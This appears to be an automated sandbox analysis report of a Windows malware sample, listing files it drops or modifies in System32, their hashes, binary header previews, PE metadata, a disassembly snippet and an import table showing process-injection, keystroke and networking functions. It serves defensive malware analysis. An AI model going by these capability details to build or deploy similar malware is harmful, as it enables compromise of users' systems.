                    Preview:2d0w02d0wx2d0w52d0w52d0w82d0wb2d0we2d0wc2d0w82d0w12d0we2d0wc2d0wc2d0wc2d0w02d0w22d0w02d0w02d0w02d0w02d0w52d0w62d0w52d0w72d0wb2d0w82d0w62d0wb2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w82d0w42d0wb2d0w92d0w62d0w52d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w82d0w62d0wb2d0wa2d0w72d0w22d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w82d0w82d0wb2d0w82d0w62d0we2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w82d0wa2d0wb2d0w92d0w62d0w52d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w82d0wc2d0wb2d0wa2d0w62d0wc2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w82d0we2d0wb2d0w82d0w32d0w32d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w92d0w02d0wb2d0w92d0w32d0w22d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w92d0w22d0wb2d0wa2d0w22d0we2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w92d0w42d0wb2d0w82d0w62d0w42d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w9

                    C:\Users\user\AppData\Roaming\a49546759c90d829.bin

                    Download File
                    Process:C:\Users\user\Desktop\LiuUGJK9vH.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):12320
                    Entropy (8bit):7.986916649895509
                    Encrypted:false
                    SSDEEP:384:TTKYsdO6qxT/dRdfETISZjklFb03G9MD+J:Tp6ordfET5ZjklFbBOD+J
                    MD5:38B2A915F3D8A3C452C8CF889D74789F
                    SHA1:FF4F7A010EF7EA4ADD0D91FD13F674329298EC24
                    SHA-256:119AD7ABB337DAF843FAF4E2EEB2B7D3C84261EE798C42EFBF4070B1427A3154
                    SHA-512:DEE7D7C354C5F0DDD6CCF909BD0116031B1F5C7C29A2DACA8E68E999588B84FBFA25D388061BC63789C4F6A649CABC09AD648B7862CFF68F91EBF0521262EB21
                    Malicious:false
                    Preview:|.Sr.Y.v.$.....#y#..W.v..K.8......D0S....bx...n.ct....+...t.);...'.....5....8A.....:oJb_..44A.4.]. ....E.T>....{Gp..[......N.`.z)&!.......S....eU.............X....P."....L.9......L....._B/.x.thHczk...d.-.ip|m~..q>...M...G .^....J....d....[..V.}.....b...dy.....w..$..!.i....@m.`...\x..~..B.....&D...b...84;w.Y.....2,..y...a..r..0.....yUz.X9{.y..=B=..~~.1.2..-....Z.j-N....._.....w......i.].\....8.......&....~Z!3....ph.~.$.sZ2.......q...i...6h.5.s.Sf~..kK2w.....Pn.bM.....p....a..!....u..?>Z\..........M..r.3H."...(..<|Z..JhP4#rY.....9..O.o.#..f8M..v..=v&..9....>,.>|M.d.0.F..1/....[{. .aO....1.wxY.e ....A.!....P.6Sz!c.A."L.m."dF..6.[..,0.........c...._x....Z....b.....*6JXpx.e.nT...?..B.Es...N%9_.L.m..*. =..+.]....:......Gt.....0f..c......\.!...z... ..{.....".......y.-1..)b0.w..BM.a~......ST..O....L.-q.......\p...\.......hf]..%.4]2l7..7@.jX..q:.<..O5zl..e(..zQO.D..|.n...~3..9..,.6.....-..H..]`...,.H"*UB.-}....s.3i>\.... }$'.K..8jV...J[.B..l.[...8..Rb..i..'.

                    C:\Windows\System32\AppVClient.exe

                    Download File
                    Process:C:\Users\user\Desktop\LiuUGJK9vH.exe
                    File Type:PE32+ executable (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):1348608
                    Entropy (8bit):7.251549984092639
                    Encrypted:false
                    SSDEEP:24576:5QW4qoNUgslKNX0Ip0MgHCpoMBOuZVg9N9JMlDlfjRiVuVsWt5MJMs:5QW9BKNX0IPgiKMBOujgFIDRRAubt5M
                    MD5:04218364223ED3D355D0195140331BD0
                    SHA1:41093B988F7A349B5C5CF9659268C794C1528C44
                    SHA-256:47F32A26BCA35873C30A9AF5E6193AD2C09C3D7736EC0BB92C40768109DC1951
                    SHA-512:D252908C9A179DD90CCBED1B820AB4CD47F886A5E37E9081DE776B01C9585AB826D1A565DA49BCC92314710E80506BFB735F241A2DDB764E5CE5391A25CA6F93
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                    C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

                    Download File
                    Process:C:\Users\user\Desktop\LiuUGJK9vH.exe
                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                    Category:modified
                    Size (bytes):1592832
                    Entropy (8bit):4.174404050329403
                    Encrypted:false
                    SSDEEP:24576:g2G7AbHjkiVg9N9JMlDlfjRiVuVsWt5MJMs:g2G7AbHjNgFIDRRAubt5M
                    MD5:96DFF145D8558851EB1FD0CBC6AB435E
                    SHA1:3A1F6943051A3192C46AC6C8212CA71137D3B220
                    SHA-256:22B199FB31575EB3664A953DCB71D0C38F337D0A77672E84AC0A74C1FF1F8C4C
                    SHA-512:5E2ADE7AD7CEB32D262A90D1246571B691FEEAEEF8FC60D6D054C8FD4EDDA6C3EF13B6F2059D4A991AA3997B293787DD1C9BF5BB579768AA75322AA51D187723
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@....................................K..... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...............n..............@...........................................................................................................................................................................................................................................................

                    C:\Windows\System32\alg.exe

                    Download File
                    Process:C:\Users\user\Desktop\LiuUGJK9vH.exe
                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):1594368
                    Entropy (8bit):4.175676290670847
                    Encrypted:false
                    SSDEEP:12288:VEP3RFFV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:WFnVg9N9JMlDlfjRiVuVsWt5MJMs
                    MD5:01FCE6399A1AC48F9D7931507B2534BB
                    SHA1:42DC16CFCB45DBFA915EA7BFF66D2B0A365F7430
                    SHA-256:54957CCD8EBE822DFEDBFE06D794610EDF5EC07B725B8CF200AC9D4E5DB293E3
                    SHA-512:A79D645A2C60514029B4A342DE32F0CBF52C81D94EC2E4A89FD774ED0EF04302F3A884EE3A6018841C62EDA81F8A5568F901F0DF84B05D11D778235F0634C979
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.....................................1.... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...............t..............@...................................................................................................................................................................................................................................

                    C:\Windows\System32\config\systemprofile\AppData\Roaming\a49546759c90d829.bin

                    Download File
                    Process:C:\Windows\System32\AppVClient.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):12320
                    Entropy (8bit):7.983876684762191
                    Encrypted:false
                    SSDEEP:384:N9wEvaejiV+fMOdbiQxgrjwiV+EhhpgUW6C:N9wEyu5fjzxajlF3LC
                    MD5:5D06C092DF742A8D897D149EEEF6042E
                    SHA1:68F4C1AC88A26B70BEFA5CBD80750C61303B292C
                    SHA-256:E09DA206354507A9476B91661B926BEFD1E24E185CEDF088376CCBBF2461B01A
                    SHA-512:80C7D18AB3B162E7EA4DCD672A4F2BFFDA2EAE3812E7A868600DF88A757B7654EC2D96AF2F58D1567CA0BA3BEB2F876D183D5BC31872EBD9C109E695A567B368
                    Malicious:false
                    Preview:m...B.9..f....|..q.FD.......s.UtMS..\>.n|..c..<.K....._#...}..6(.S/..$.&.3A...'.J:....X .|3.&GC....U.up.^..g..v.j...C.]R...}..G.%.1.....<....Q.....S[.>.!`AT.W.I.I.....l.L.B..J.V_,....(.....Y...*.,....~....`.....&..z{.5.Ia..ST.VQ..,.j._=(ed..`.GG.......0."..c?..!R..i.Q.z.]..!.#}.4...*.].]N..<..f...e4.7.2.hk...5@;...:.Q.....{...":..|.1.'......7>P../x...a...e0Et'.......2Z7.-..|}.&.....a...7.X.Bq....8..#.W.!L._1p.....y..<I.]'d.."......Q..eq..*.m.:".x...5...t..m....hwJY..P.t.6n/T'..:.+Z.s..@...a1Rv.9[..v.N....J...k..E.q..n_.b.bi,.k+.../....Y=...A..hd........e)aJ.....fv};8..#.uS.....t.^1..nn.A...}.....n.+,.3...O.8.V.RQ)J.A...y..=D."...rr.A....r|3.....4=_.s.m..."V.W...... .g......7.......[..H.l..j......a..v.q..h..;...h:E...^...y.../S....j.X..A.d$..q^.l-..ol./.JM...^..D.[.^\.......*xa......n.G.X...(.... O...78...Z&....e...4.p.b9.D....V6h.5..[.$...g._b+..'(..B"4.l......T.Z..F.+.|.pY...l..*.i1.W.|,.[...0Z.c..F[(..?`.T.....;......p...iD+./.a.&,\8"

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.505116096201164
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:LiuUGJK9vH.exe
                    File size:1'761'792 bytes
                    MD5:690a2cbb7f785f6f90a0b510f31d40de
                    SHA1:624e1b8b472706e33e7d9b90ac1626153854433f
                    SHA256:1273e390eab2f69aa5ed380f296a7cd6c8ff01142367fe5dd76eae5f515947e2
                    SHA512:8b36aead66b13820b0d298210edc319e043e2910bb3a7c23f22dfa0a55a535e7f668996e3a57c35b411b04d40cf9d1d7535959cd7be50ce7e84a7651c2f5bfd4
                    SSDEEP:49152:Hd0c++OCvkGs9FaXVbf1deFYpgFIDRRAubt5M:9B3vkJ9mbf1deFHUf
                    TLSH:9285E02273DDC370CB669173FF6AB7016EBB3C610630B95B2F980D79A960161162D7A3
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                    File Icon

                    Icon Hash:aaf3e3e3938382a0

                    Static PE Info

                    General

                    Entrypoint:0x427dcd
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    DLL Characteristics:TERMINAL_SERVER_AWARE
                    Time Stamp:0x6756D4C9 [Mon Dec 9 11:30:17 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:afcdf79be1557326c854b6e20cb900a7

                    Entrypoint Preview

                    Instruction
                    call 00007F8354D3494Ah
                    jmp 00007F8354D27714h
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    push edi
                    push esi
                    mov esi, dword ptr [esp+10h]
                    mov ecx, dword ptr [esp+14h]
                    mov edi, dword ptr [esp+0Ch]
                    mov eax, ecx
                    mov edx, ecx
                    add eax, esi
                    cmp edi, esi
                    jbe 00007F8354D2789Ah
                    cmp edi, eax
                    jc 00007F8354D27BFEh
                    bt dword ptr [004C31FCh], 01h
                    jnc 00007F8354D27899h
                    rep movsb
                    jmp 00007F8354D27BACh
                    cmp ecx, 00000080h
                    jc 00007F8354D27A64h
                    mov eax, edi
                    xor eax, esi
                    test eax, 0000000Fh
                    jne 00007F8354D278A0h
                    bt dword ptr [004BE324h], 01h
                    jc 00007F8354D27D70h
                    bt dword ptr [004C31FCh], 00000000h
                    jnc 00007F8354D27A3Dh
                    test edi, 00000003h
                    jne 00007F8354D27A4Eh
                    test esi, 00000003h
                    jne 00007F8354D27A2Dh
                    bt edi, 02h
                    jnc 00007F8354D2789Fh
                    mov eax, dword ptr [esi]
                    sub ecx, 04h
                    lea esi, dword ptr [esi+04h]
                    mov dword ptr [edi], eax
                    lea edi, dword ptr [edi+04h]
                    bt edi, 03h
                    jnc 00007F8354D278A3h
                    movq xmm1, qword ptr [esi]
                    sub ecx, 08h
                    lea esi, dword ptr [esi+08h]
                    movq qword ptr [edi], xmm1
                    lea edi, dword ptr [edi+08h]
                    test esi, 00000007h
                    je 00007F8354D278F5h
                    bt esi, 03h
                    jnc 00007F8354D27948h

                    Rich Headers

                    Programming Language:
                    • [ASM] VS2013 build 21005
                    • [ C ] VS2013 build 21005
                    • [C++] VS2013 build 21005
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729
                    • [ASM] VS2013 UPD4 build 31101
                    • [RES] VS2013 build 21005
                    • [LNK] VS2013 UPD4 build 31101

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x57b24.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x8dcc40x8de003de9cc8884ce5b00bc2079b745b786a7False0.5728679102422908data6.676133860974604IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0xc70000x57b240x57c00536b3a2dacb66be13de7645ab0e3eb9fFalse0.9249215411324786data7.887704577352067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0x11f0000x960000x950000f4e3d5187d83a5598d2c68e6fef89e8False0.97575470585151data7.938033667934618IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                    Resources

                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                    RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                    RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                    RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                    RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                    RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                    RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                    RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                    RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                    RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                    RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                    RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                    RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                    RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                    RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                    RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                    RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                    RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                    RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                    RT_RCDATA0xcf7b80x4edeadata1.0003281225816436
                    RT_GROUP_ICON0x11e5a40x76dataEnglishGreat Britain0.6610169491525424
                    RT_GROUP_ICON0x11e61c0x14dataEnglishGreat Britain1.25
                    RT_GROUP_ICON0x11e6300x14dataEnglishGreat Britain1.15
                    RT_GROUP_ICON0x11e6440x14dataEnglishGreat Britain1.25
                    RT_VERSION0x11e6580xdcdataEnglishGreat Britain0.6181818181818182
                    RT_MANIFEST0x11e7340x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                    Imports

                    DLLImport
                    WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                    VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                    WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                    PSAPI.DLLGetProcessMemoryInfo
                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                    USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                    UxTheme.dllIsThemeActive
                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                    USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                    GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                    COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                    SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                    OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                    Possible Origin
